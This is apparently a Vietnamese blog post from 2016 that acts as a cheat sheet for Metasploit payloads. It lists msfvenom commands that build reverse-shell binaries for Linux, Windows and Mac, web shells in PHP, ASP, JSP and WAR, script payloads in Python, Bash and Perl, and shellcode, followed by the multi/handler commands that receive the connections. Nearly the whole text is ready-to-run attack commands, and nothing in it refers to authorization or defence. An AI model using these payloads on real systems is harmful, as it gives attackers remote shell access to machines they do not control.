Hướng dẫn sử dụng Metasploit Payloads

By | 7:27 pm | 07/05/2016

Một trong những tính năng hữu ích nhất của Metasploit là msfpayload module. Nhiều payloads có thể được tạo ra với module này và có thể tạo cho bạn shell trong hầu hết mọi tình huống. Đối với mỗi một trong các payloads, bạn có thể dùng msfconsole và chọn exploit/multi/handler, chạy lệnh ‘set payload’ cho các payloads liên quan và cấu hình các tùy chọn cần thiết (LHOST, LPORT, vv), Execute và đợi các payload chạy xong. LHOST thường là IP của bạn(IP Lan nếu trong cùng mạng lan, ip wan nếu attack trên internet).
metasploit payloads
List payloads

msfvenom -l

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode: Đối với shellcode sử dụng ‘msfvenom –help-formats’ để xem thông tin và các tham số cần thiết

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers : Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z